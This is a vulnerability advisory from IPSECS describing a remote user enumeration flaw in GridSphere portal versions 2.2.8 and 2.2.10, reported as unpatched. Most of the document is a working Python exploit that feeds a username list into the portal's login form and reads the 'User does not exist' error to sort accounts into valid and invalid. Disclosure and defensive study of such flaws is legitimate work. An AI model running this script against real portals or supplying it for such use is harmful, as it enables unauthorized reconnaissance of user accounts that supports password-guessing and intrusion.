######################################################################## # GRIDSPHERE REMOTE USER ENUMERATION ######################################################################## Author : IPSECS Website: http://ipsecs.com [i] Description GridSphere is web based portal framework to access grid computing resources. The GridSphere provides an open-source portlet based Web portal. GridSphere enables developers to quickly develop and package third-party portlet web applications that can be run and administered within the GridSphere portlet container. Vendor URL http://gridsphere.org Vulnerable Version GridSphere 2.2.8 GridSphere 2.2.10 Other may be vulnerable [ii] Problem Description GridSphere which is critically uses to access grid resource is found to be vulnerable that can be exploited to enumerate a user is valid or not in grid. This vulnerability exist due to the response of gridsphere in handling in-exist user with “User does not exist“. [iii] Exploit and PoC You can download at http://ipsecs.com/web/?p=178 #!/usr/bin/python # Gridsphere - gridportlet remote user enumeration exploit # Copyright IPSECS (c) 2010 http://ipsecs.com # Thanks to underground people who gives idea about python and javascript # You know who you are :-) import sys,re,os from urllib2 import urlopen #You need to install ClientForm from this site #http://wwwsearch.sourceforge.net/old/ClientForm from ClientForm import ParseResponse def main(): if len(sys.argv) !=3: print "Usage : python " + sys.argv[0] + " [URL Login] [User List File]" print "Example : python " + sys.argv[0] + " https://example.com/acgt/portal?cid=mptoolportlet1 users.txt" sys.exit(0); response = urlopen(sys.argv[1]) forms = ParseResponse(response, backwards_compat=False) #You have to modify the index in some cases! #Try to print what is inside forms[0] forms[1] forms[2] etc form = forms[2] input = open(sys.argv[2],"r") for user in input: original_text = form["username"] form["username"] = user.rstrip() original_text = form["password"] form["password"] = "password" result = urlopen(form.click()).read() igot = re.search("User does not exist",result) if igot: print "[INVALID] " + user.rstrip() else: print "[OK] " + user.rstrip() if __name__ == '__main__': main() [iv] Fix Currently there's no patch for this vulnerability.